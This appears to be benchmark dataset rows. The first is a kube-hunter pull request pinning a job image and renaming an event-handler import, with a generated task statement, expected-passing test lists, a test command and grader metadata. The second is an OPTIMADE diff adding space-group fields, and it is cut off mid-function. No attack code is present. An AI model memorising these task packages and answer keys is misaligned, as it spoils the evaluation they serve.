b/kube_hunter/modules/hunting/proxy.py index 0570d3d..ae417f8 100644 --- a/kube_hunter/modules/hunting/proxy.py +++ b/kube_hunter/modules/hunting/proxy.py @@ -4,7 +4,7 @@ import requests from enum import Enum from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure from kube_hunter.core.types import ( ActiveHunter, diff --git a/kube_hunter/modules/hunting/secrets.py b/kube_hunter/modules/hunting/secrets.py index 36e09d7..81d34bb 100644 --- a/kube_hunter/modules/hunting/secrets.py +++ b/kube_hunter/modules/hunting/secrets.py @@ -1,7 +1,7 @@ import logging import os -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique from kube_hunter.modules.discovery.hosts import RunningAsPodEvent diff --git a/kube_hunter/modules/report/collector.py b/kube_hunter/modules/report/collector.py index 3843020..f601838 100644 --- a/kube_hunter/modules/report/collector.py +++ b/kube_hunter/modules/report/collector.py @@ -2,7 +2,7 @@ import logging import threading from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import ( Event, Service,
pin image version ## Description This pins the image version in the job manifest. Using this manifest directly (for example `kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-hunter/v0.6.7/job.yaml`) on a pinned version, will allow using that manifest without having to maintain your own, and allowing changes to this repo without breaking a pipeline. For example, using the job manifest now will fail because of #502 , and there's no previous manifest to refer to. ### Version tag discrepancy I've also upped the semver tagging in the GitHub actions to coincide with the `kube-bench` format (as well as the format in the tags of this repo). Using the job manifest now will fail, as it first needs to publish with the new tag format. This shouldn't impact any existing setups, as latest will stay as it is, and older tags will remain as they are. ### Other Also added label for the pod, and removed backofflimit to just use the default of 6. Cleaner and the same as `kube-bench`. ## Contribution Guidelines Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md). ## Fixed Issues Did not make an issue. ## "BEFORE" and "AFTER" output No terminal output changes ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an active issue in the repository. - [ ] I have added automated testing to cover this case. ## Notes Please mention if you have not checked any of the above boxes.
**Title** Pin Kubernetes‑hunter image version and migrate event‑handler imports **Problem** - The job manifest referenced an un‑pinned container image, causing pipelines that apply the upstream manifest to break when the image tag changes. - The internal event‑handler module was moved but import paths throughout the codebase still pointed to the old location, leading to import errors and potential circular‑import issues. - The CI workflow used an outdated version of the Docker‑meta GitHub Action. **Root Cause** - Using a floating image tag and stale import paths left the repository mismatched with the released artifacts and the new module layout. **Fix / Expected Behavior** - The job manifest now references a specific version of the container image and includes a stable label, while relying on the default back‑off behavior. - All internal references to the event‑handler are updated to the new module path, and the package’s public interface reflects this change. - The publish workflow is switched to the current version of the Docker‑meta action, ensuring correct version tagging during releases. - Applying the upstream job manifest with `kubectl apply -f …/job.yaml` works reliably across releases without requiring local modifications. **Risk & Validation** - Verify that the updated manifest successfully creates a pod that runs the pinned image version. - Run the full test suite to confirm that the new import paths resolve correctly and no circular‑import errors appear. - Ensure the CI workflow completes and generates correctly versioned Docker images.
504
aquasecurity/kube-hunter
diff --git a/tests/core/test_handler.py b/tests/core/test_handler.py index 46baab5..3639505 100644 --- a/tests/core/test_handler.py +++ b/tests/core/test_handler.py @@ -4,7 +4,7 @@ from kube_hunter.conf import Config, set_config, get_config set_config(Config(active=True)) -from kube_hunter.core.events.handler import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.modules.discovery.apiserver import ApiServiceDiscovery from kube_hunter.modules.discovery.dashboard import KubeDashboard as KubeDashboardDiscovery from kube_hunter.modules.discovery.etcd import EtcdRemoteAccess as EtcdRemoteAccessDiscovery diff --git a/tests/core/test_subscribe.py b/tests/core/test_subscribe.py index 6dc0fc8..094eaeb 100644 --- a/tests/core/test_subscribe.py +++ b/tests/core/test_subscribe.py @@ -3,7 +3,7 @@ import time from kube_hunter.conf import Config, set_config from kube_hunter.core.types import Hunter from kube_hunter.core.events.types import Event, Service -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 first_run = True diff --git a/tests/discovery/test_apiserver.py b/tests/discovery/test_apiserver.py index dba49ea..83d4e98 100644 --- a/tests/discovery/test_apiserver.py +++ b/tests/discovery/test_apiserver.py @@ -8,7 +8,7 @@ set_config(Config()) from kube_hunter.modules.discovery.apiserver import ApiServer, ApiServiceDiscovery from kube_hunter.core.events.types import Event -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 diff --git a/tests/discovery/test_hosts.py b/tests/discovery/test_hosts.py index c9ce2a2..35fcd14 100644 --- a/tests/discovery/test_hosts.py +++ b/tests/discovery/test_hosts.py @@ -6,7 +6,7 @@ from kube_hunter.modules.discovery.hosts import ( HostDiscoveryHelpers, ) from kube_hunter.core.types import Hunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler import json import requests_mock import pytest diff --git a/tests/hunting/test_apiserver_hunter.py b/tests/hunting/test_apiserver_hunter.py index 774d485..ff8c360 100644 --- a/tests/hunting/test_apiserver_hunter.py +++ b/tests/hunting/test_apiserver_hunter.py @@ -23,7 +23,7 @@ from kube_hunter.modules.hunting.apiserver import ApiServerPassiveHunterFinished from kube_hunter.modules.hunting.apiserver import CreateANamespace, DeleteANamespace from kube_hunter.modules.discovery.apiserver import ApiServer from kube_hunter.core.types import ExposedSensitiveInterfacesTechnique, AccessK8sApiServerTechnique -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 diff --git a/tests/hunting/test_certificates.py b/tests/hunting/test_certificates.py index 9697545..2edfdd2 100644 --- a/tests/hunting/test_certificates.py +++ b/tests/hunting/test_certificates.py @@ -5,7 +5,7 @@ set_config(Config()) from kube_hunter.core.events.types import Event from kube_hunter.modules.hunting.certificates import CertificateDiscovery, CertificateEmail -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler def test_CertificateDiscovery(): diff --git a/tests/hunting/test_cvehunting.py b/tests/hunting/test_cvehunting.py index df5047b..1a378ca 100644 --- a/tests/hunting/test_cvehunting.py +++ b/tests/hunting/test_cvehunting.py @@ -5,7 +5,7 @@ from kube_hunter.conf import Config, set_config set_config(Config()) -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import K8sVersionDisclosure from kube_hunter.modules.hunting.cves import ( K8sClusterCveHunter, diff --git a/tests/hunting/test_kubelet.py b/tests/hunting/test_kubelet.py index dcbce44..ed13955 100644 --- a/tests/hunting/test_kubelet.py +++ b/tests/hunting/test_kubelet.py @@ -3,7 +3,7 @@ import requests_mock import urllib.parse import uuid -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.modules.hunting.kubelet import ( AnonymousAuthEnabled, ExposedExistingPrivilegedContainersViaSecureKubeletPort,
[ "tests/core/test_handler.py::test_passive_hunters_registered", "tests/core/test_handler.py::test_active_hunters_registered", "tests/core/test_handler.py::test_all_hunters_registered", "tests/core/test_subscribe.py::test_subscribe_mechanism", "tests/core/test_subscribe.py::test_subscribe_once_mechanism", "tests/core/test_subscribe.py::test_subscribe_many_mechanism", "tests/discovery/test_apiserver.py::test_ApiServer", "tests/discovery/test_apiserver.py::test_ApiServerWithServiceAccountToken", "tests/discovery/test_apiserver.py::test_InsecureApiServer", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_azure_pod_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_azure_pod_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v1_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v1_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v2_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v2_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_execute_scan_cidr", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_execute_scan_remote", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_valid_cidr", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_valid_ignore", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_invalid_cidr", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_invalid_ignore", "tests/hunting/test_apiserver_hunter.py::test_ApiServerToken", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServer", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServerActive", "tests/hunting/test_certificates.py::test_CertificateDiscovery", "tests/hunting/test_cvehunting.py::TestCveUtils::test_is_downstream", "tests/hunting/test_cvehunting.py::TestCveUtils::test_ignore_downstream", "tests/hunting/test_kubelet.py::test_get_request_valid_url", "tests/hunting/test_kubelet.py::test_get_request_invalid_url", "tests/hunting/test_kubelet.py::test_post_request_valid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_valid_url_without_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_without_parameters", "tests/hunting/test_kubelet.py::test_has_no_exception_result_with_exception", "tests/hunting/test_kubelet.py::test_has_no_exception_result_without_exception", "tests/hunting/test_kubelet.py::test_has_no_error_result_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_result_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_with_error", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_privileged_setting", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_capabilities", "tests/hunting/test_kubelet.py::test_proveanonymousauth_connectivity_issues", "tests/hunting/test_kubelet.py::test_check_file_exists_existing_file", "tests/hunting/test_kubelet.py::test_check_file_exists_non_existent_file", "tests/hunting/test_kubelet.py::test_rm_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rm_command_removed_failed", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_touch", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_chmod", "tests/hunting/test_kubelet.py::test_check_directory_exists_existing_directory", "tests/hunting/test_kubelet.py::test_check_directory_exists_non_existent_directory", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_failed", "tests/hunting/test_kubelet.py::test_get_root_values_success", "tests/hunting/test_kubelet.py::test_get_root_values_failure", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_cmdline", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_findfs", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mkdir", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mount", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_hostname", "tests/hunting/test_kubelet.py::test_maliciousintentviasecurekubeletport_success" ]
[]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_handler.py tests/core/test_subscribe.py tests/discovery/test_apiserver.py tests/discovery/test_hosts.py tests/hunting/test_apiserver_hunter.py tests/hunting/test_certificates.py tests/hunting/test_cvehunting.py tests/hunting/test_kubelet.py" }
{ "num_modified_files": 26, "num_modified_lines": 30, "pr_author": "rhtenhove", "pr_labels": [], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests pinning the Docker image version in job.yaml and updating the workflow, but the provided test patch only changes import paths across many test and source files, which is unrelated to the manifest change. The tests now expect a specific module name (event_handler) that the issue never mentioned, indicating an implicit naming requirement. This misalignment signals a B2 problem despite the issue’s intent being otherwise complete.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect import path 'kube_hunter.core.events.event_handler' instead of the original 'kube_hunter.core.events.handler', which is not mentioned in the issue." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
56450cb8eaaf37904c1f551aa926c94c1953135e
2025-03-03 20:16:35
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.60%. Comparing base [(`56450cb`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/56450cb8eaaf37904c1f551aa926c94c1953135e?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`7230e65`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7230e6589f43db8d2e5e39f991253ef7691d5c46?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2240 +/- ## ========================================== + Coverage 90.58% 90.60% +0.02% ========================================== Files 75 75 Lines 4917 4929 +12 ========================================== + Hits 4454 4466 +12 Misses 463 463 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <100.00%> (+0.02%)` | :arrow_up: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2240
diff --git a/openapi/openapi.json b/openapi/openapi.json index 21a0b349..5a76f8e1 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -4371,6 +4371,68 @@ "x-optimade-queryable": "optional", "x-optimade-support": "optional" }, + "space_group_symbol_hall": { + "anyOf": [ + { + "type": "string" + }, + { + "type": "null" + } + ], + "title": "Space Group Symbol Hall", + "description": "A Hall space group symbol representing the symmetry of the structure as defined in (Hall, 1981, 1981a).\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The change-of-basis operations are used as defined in the International Tables of Crystallography (ITC) Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001).\n - Each component of the Hall symbol MUST be separated by a single space symbol.\n - If there exists a standard Hall symbol which represents the symmetry it SHOULD be used.\n - MUST be `null` if `nperiodic_dimensions` is not equal to 3.\n\n- **Examples**:\n - Space group symbols with explicit origin (the Hall symbols):\n - `P 2c -2ac`\n - `I 4bd 2ab 3`\n - Space group symbols with change-of-basis operations:\n - `P 2yb (-1/2*x+z,1/2*x,y)`\n - `-I 4 2 (1/2*x+1/2*y,-1/2*x+1/2*y,z)`\n\n- **Bibliographic References**:\n - Hall, S. R. (1981) Space-group notation with an explicit origin. Acta Crystallographica Section A, 37, 517-525, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001228\n - Hall, S. R. (1981a) Space-group notation with an explicit origin; erratum. Acta Crystallographica Section A, 37, 921-921, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001976\n - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers.", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_symbol_hermann_mauguin": { + "anyOf": [ + { + "type": "string", + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$" + }, + { + "type": "null" + } + ], + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$", + "title": "Space Group Symbol Hermann Mauguin", + "description": "A human- and machine-readable string containing the short Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The H-M symbol SHOULD aim to convey the closest representation of the symmetry information that can be specified using the short format used in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1 as described in the accompanying text.\n - The symbol MAY be a non-standard short H-M symbol.\n - The H-M symbol does not unambiguously communicate the axis, cell, and origin choice, and the given symbol SHOULD NOT be amended to convey this information.\n - To encode as character strings, the following adaptations MUST be made when representing H-M symbols given in their typesetted form:\n - the overbar above the numbers MUST be changed to the minus sign in front of the digit (e.g. '-2');\n - subscripts that denote screw axes are written as digits immediately after the axis designator without a space (e.g. 'P 32')\n - the space group generators MUST be separated by a single space (e.g. 'P 21 21 2');\n - there MUST be no spaces in the space group generator designation (i.e. use 'P 21/m', not the 'P 21 / m');\n\n- **Examples**:\n - `C 2`\n - `P 21 21 21`\n\n- **Bibliographic References**:\n - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer.\n", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_symbol_hermann_mauguin_extended": { + "anyOf": [ + { + "type": "string", + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$" + }, + { + "type": "null" + } + ], + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$", + "title": "Space Group Symbol Hermann Mauguin Extended", + "description": "A human- and machine-readable string containing the extended Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The H-M symbols SHOULD be given as specified in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1.\n - The change-of-basis operation SHOULD be provided for the non-standard axis and cell choices.\n - The extended H-M symbol does not unambiguously communicate the origin choice, and the given symbol SHOULD NOT be amended to convey this information.\n - The description of the change-of-basis SHOULD follow conventions of the ITC Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001).\n - The same character string encoding conventions MUST be used as for the specification of the `space_group_symbol_hermann_mauguin` property.\n\n- **Examples**:\n - `C 1 2 1`\n\n- **Bibliographic References**:\n - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers.\n - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer.\n\n", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_it_number": { + "anyOf": [ + { + "type": "integer", + "maximum": 230.0, + "minimum": 1.0 + }, + { + "type": "null" + } + ], + "title": "Space Group It Number", + "description": "Space group number which specifies the space group of the structure as defined in the International Tables for Crystallography Vol. A. (IUCr, 2005).\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The integer value MUST be between 1 and 230.\n - MUST be null if `nperiodic_dimensions` is not equal to 3.", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, "cartesian_site_positions": { "anyOf": [ { diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c61770a8..773acead 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -11,6 +11,7 @@ from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, CHEMICAL_SYMBOLS, + HM_SYMBOL_REGEXP, OptimadeField, StrictField, SupportLevel, @@ -601,6 +602,119 @@ Note: the elements in this list each refer to the direction of the corresponding ), ] = None + space_group_symbol_hall: Annotated[ + str | None, + OptimadeField( + description="""A Hall space group symbol representing the symmetry of the structure as defined in (Hall, 1981, 1981a). + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The change-of-basis operations are used as defined in the International Tables of Crystallography (ITC) Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001). + - Each component of the Hall symbol MUST be separated by a single space symbol. + - If there exists a standard Hall symbol which represents the symmetry it SHOULD be used. + - MUST be `null` if `nperiodic_dimensions` is not equal to 3. + +- **Examples**: + - Space group symbols with explicit origin (the Hall symbols): + - `P 2c -2ac` + - `I 4bd 2ab 3` + - Space group symbols with change-of-basis operations: + - `P 2yb (-1/2*x+z,1/2*x,y)` + - `-I 4 2 (1/2*x+1/2*y,-1/2*x+1/2*y,z)` + +- **Bibliographic References**: + - Hall, S. R. (1981) Space-group notation with an explicit origin. Acta Crystallographica Section A, 37, 517-525, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001228 + - Hall, S. R. (1981a) Space-group notation with an explicit origin; erratum. Acta Crystallographica Section A, 37, 921-921, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001976 + - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ), + ] = None + + space_group_symbol_hermann_mauguin: Annotated[ + str | None, + OptimadeField( + description="""A human- and machine-readable string containing the short Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response. + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The H-M symbol SHOULD aim to convey the closest representation of the symmetry information that can be specified using the short format used in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1 as described in the accompanying text. + - The symbol MAY be a non-standard short H-M symbol. + - The H-M symbol does not unambiguously communicate the axis, cell, and origin choice, and the given symbol SHOULD NOT be amended to convey this information. + - To encode as character strings, the following adaptations MUST be made when representing H-M symbols given in their typesetted form: + - the overbar above the numbers MUST be changed to the minus sign in front of the digit (e.g. '-2'); + - subscripts that denote screw axes are written as digits immediately after the axis designator without a space (e.g. 'P 32') + - the space group generators MUST be separated by a single space (e.g. 'P 21 21 2'); + - there MUST be no spaces in the space group generator designation (i.e. use 'P 21/m', not the 'P 21 / m'); + +- **Examples**: + - `C 2` + - `P 21 21 21` + +- **Bibliographic References**: + - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer. +""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + pattern=HM_SYMBOL_REGEXP, + ), + ] = None + + space_group_symbol_hermann_mauguin_extended: Annotated[ + str | None, + OptimadeField( + description="""A human- and machine-readable string containing the extended Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response. + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The H-M symbols SHOULD be given as specified in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1. + - The change-of-basis operation SHOULD be provided for the non-standard axis and cell choices. + - The extended H-M symbol does not unambiguously communicate the origin choice, and the given symbol SHOULD NOT be amended to convey this information. + - The description of the change-of-basis SHOULD follow conventions of the ITC Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001). + - The same character string encoding conventions MUST be used as for the specification of the `space_group_symbol_hermann_mauguin` property. + +- **Examples**: + - `C 1 2 1` + +- **Bibliographic References**: + - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers. + - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer. + +""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + pattern=HM_SYMBOL_REGEXP, + ), + ] = None + + space_group_it_number: Annotated[ + int | None, + OptimadeField( + description="""Space group number which specifies the space group of the structure as defined in the International Tables for Crystallography Vol. A. (IUCr, 2005). + +- **Type**: integer + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The integer value MUST be between 1 and 230. + - MUST be null if `nperiodic_dimensions` is not equal to 3.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ge=1, + le=230, + ), + ] = None + cartesian_site_positions: Annotated[ list[Vector3D] | None, OptimadeField( diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 75ad8eb4..e14eb2c8 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -234,6 +234,18 @@ ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" SYMMETRY_OPERATION_REGEXP = r"^([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?),([-+]?[xyz]([-+][xyz])?([-+](1/2|[12]/3|[1-3]/4|[1-5]/6))?|[-+]?(1/2|[12]/3|[1-3]/4|[1-5]/6)([-+][xyz]([-+][xyz])?)?)$" +HM_SYMBOL_REGEXP = r"^(P|I|F|A|B|C|R)(\s+\d+|\s+[a-z]+|\s+\d+/[a-z]+|\s+\d+/\d+|\s+-\d*|\s+\d+/m|\s+[a-z]+/m)*$" + + +def _generate_symmetry_operation_regex(): + translation = "1/2|[12]/3|[1-3]/4|[1-5]/6" + translation_appended = f"[-+]? [xyz] ([-+][xyz])? ([-+] ({translation}) )?" + translation_prepended = f"[-+]? 